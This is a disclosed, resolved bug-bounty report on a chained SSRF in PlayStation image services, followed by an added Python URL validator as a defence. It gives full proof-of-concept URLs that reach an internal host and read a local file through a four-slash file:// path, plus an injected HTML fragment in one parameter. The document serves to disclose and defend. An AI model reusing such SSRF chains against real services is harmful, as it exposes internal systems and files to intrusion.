SSRF chained to hit an internal host, leading to another SSRF which allows reading internal images.

High
PlayStation

Team Summary

Official summary from PlayStation

## Report Summary

We found an SSRF at https://image.api.np.km.playstation.net/. Vulnerable endpoints: `/images`, `/dis/images`, using the `image` GET parameter.

## Description

This endpoint allows us to fetch a remote image over the HTTP protocol using the `image` GET parameter and convert it to the desired format using the GET parameter `format`. We found that this could hit internal hosts; however, the response needs to be a valid image, and the `file` protocol isn't working here.

For example: the host https://store.mgmt.playstation.com/ (**mgmt** keyword hosts are meant to be internal for PSN) will respond with a 403; however, I found it hosts an image that can be opened using this SSRF.

https://store.mgmt.playstation.com/store/api/chihiro/00_09_000/container/US/en/999/UP4134-CUSA00329_00-ONNTGAME00000001/1429722215000/image?_version=00_09_000&platform=chihiro&w=225&h=225&bg_color=000000&opacity=100

This will give you a 403.

**Using SSRF to open this URL:**

https://image.api.np.km.playstation.net/images/?format=png&image=https%3a//store.mgmt.playstation.com/store/api/chihiro/00_09_000/container/US/en/999/UP4134-CUSA00329_00-ONNTGAME00000001/1429722215000/image%3f_version%3d00_09_000%26platform%3dchihiro%26w%3d225%26h%3d225%26bg_color%3d000000%26opacity%3d100

## Taking it further and finding another SSRF to extract internal images using the `file` protocol

We found an internal host of PSN which serves remote images with our given text (PhantomJS). On further analysis we found this service could make use of the `file` protocol as well, and hence we could extract internal images as a PoC.

Host: https://dis.api.np.playstation.net/dis/v1/banners?backplate=https://homer.dl.playstation.net/pr/bam-art/272/352/44592b67-85ac-41d6-b310-334363c5ea58.jpg&dimensions=790x250&price=$36.99&price_discount=$24.41&format[]=PS4&type=Full Game&locale=en_CA&cta=Download Now!&output=png&tpl=banner-web-store&store=game&region=us&

Opening the above URL will result in a timeout.

We use our SSRF to hit this host and abuse the other SSRF to read internal files/images.

https://image.api.np.km.playstation.net/dis/images/?format=png&image=https%3A%2F%2Fdis.api.np.playstation.net%2Fdis%2Fv1%2Fbanners%3Fbackplate%3Dfile:////usr/share/pixmaps/system-logo-white.png%26dimensions%3D790x250%26price%3D%2436.99%26price_discount%3D%2424.41%26format%5B%5D%3DPS4%26type%3DF%22%3e%3c%73%3eull+Game%26locale%3Den_CA%26cta%3DDownload+No%26output%3Dsvg%26tpl%3Dbanner-web-store%26store%3Dgame%26region%3Dus%26

**Flow is:** image.api.np.km.playstation.net -> dis.api.np.playstation.net -> fetches the local image using `file://` -> adds the given data to the image -> image served on dis.api.np.playstation.net -> image served to us (using image.api.np.km.playstation.net)

## Steps to reproduce

- Open https://image.api.np.km.playstation.net/dis/images/?format=png&image=https%3A%2F%2Fdis.api.np.playstation.net%2Fdis%2Fv1%2Fbanners%3Fbackplate%3Dfile:////usr/share/pixmaps/system-logo-white.png%26dimensions%3D790x250%26price%3D%2436.99%26price_discount%3D%2424.41%26format%5B%5D%3DPS4%26type%3DF%22%3e%3c%73%3eull+Game%26locale%3Den_CA%26cta%3DDownload+No%26output%3Dsvg%26tpl%3Dbanner-web-store%26store%3Dgame%26region%3Dus%26 to open `file:////usr/share/pixmaps/system-logo-white.png` on the `dis.api.np.playstation.net` host using `image.api.np.km.playstation.net`.

## Impact

SSRF to local image read using `file:///`.
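The fix for an image proxy like the one in this report is to validate the fetch URL before issuing the request: allow only http(s), refuse hosts that resolve to non-public addresses, and apply the same check to URL-shaped query values so a second hop hidden in `image=` or `backplate=` is caught at the edge. The code below is an added example, not PlayStation's code or the reporter's; `FAKE_DNS` and its addresses are constructed stand-ins, and `CHAIN_URL` is the report's PoC URL shortened to its first parameters.

```python
import ipaddress
from urllib.parse import urlparse, parse_qsl

ALLOWED_SCHEMES = {"http", "https"}

# Constructed stand-in for DNS (hypothetical addresses): the real services' IPs
# are not on the page. Production code resolves with socket.getaddrinfo and pins
# the checked address for the actual fetch.
FAKE_DNS = {
    "image.api.np.km.playstation.net": "93.184.216.34",  # public edge (constructed)
    "homer.dl.playstation.net": "93.184.216.35",         # public CDN (constructed)
    "store.mgmt.playstation.com": "10.20.30.40",         # internal host per the report
    "dis.api.np.playstation.net": "10.20.30.41",         # internal second hop
}

# Two URLs quoted in the report: the benign backplate image and the chained PoC (shortened).
HOMER_URL = "https://homer.dl.playstation.net/pr/bam-art/272/352/44592b67-85ac-41d6-b310-334363c5ea58.jpg"
CHAIN_URL = ("https://image.api.np.km.playstation.net/dis/images/?format=png&image="
             "https%3A%2F%2Fdis.api.np.playstation.net%2Fdis%2Fv1%2Fbanners%3Fbackplate%3D"
             "file:////usr/share/pixmaps/system-logo-white.png%26dimensions%3D790x250")

def is_public(ip_text):
    ip = ipaddress.ip_address(ip_text)
    return ip.is_global and not ip.is_multicast

def check_fetch_url(url, depth=0):
    """Return (ok, reason). Rejects schemes other than http(s) (so file: fails even
    in the four-slash form), hosts resolving to non-public addresses, and any
    URL-shaped query value, so a hop nested inside image= or backplate= is caught."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    ip_text = FAKE_DNS.get(host)
    if ip_text is None:
        return False, f"{host} does not resolve"
    if not is_public(ip_text):
        return False, f"{host} resolves to non-public {ip_text}"
    if depth >= 2:
        return False, "nested URL too deep"
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if "://" in value or value.lower().startswith("file:"):
            ok, reason = check_fetch_url(value, depth + 1)
            if not ok:
                return False, f"nested {key}=: {reason}"
    return True, "ok"
```

The stand-in resolver glosses over DNS rebinding and HTTP redirects; a real deployment must connect to the address it validated and re-run the check on every redirect target.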

Reported by bugdiscloseguys

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$1000.00

Weakness

Server-Side Request Forgery (SSRF)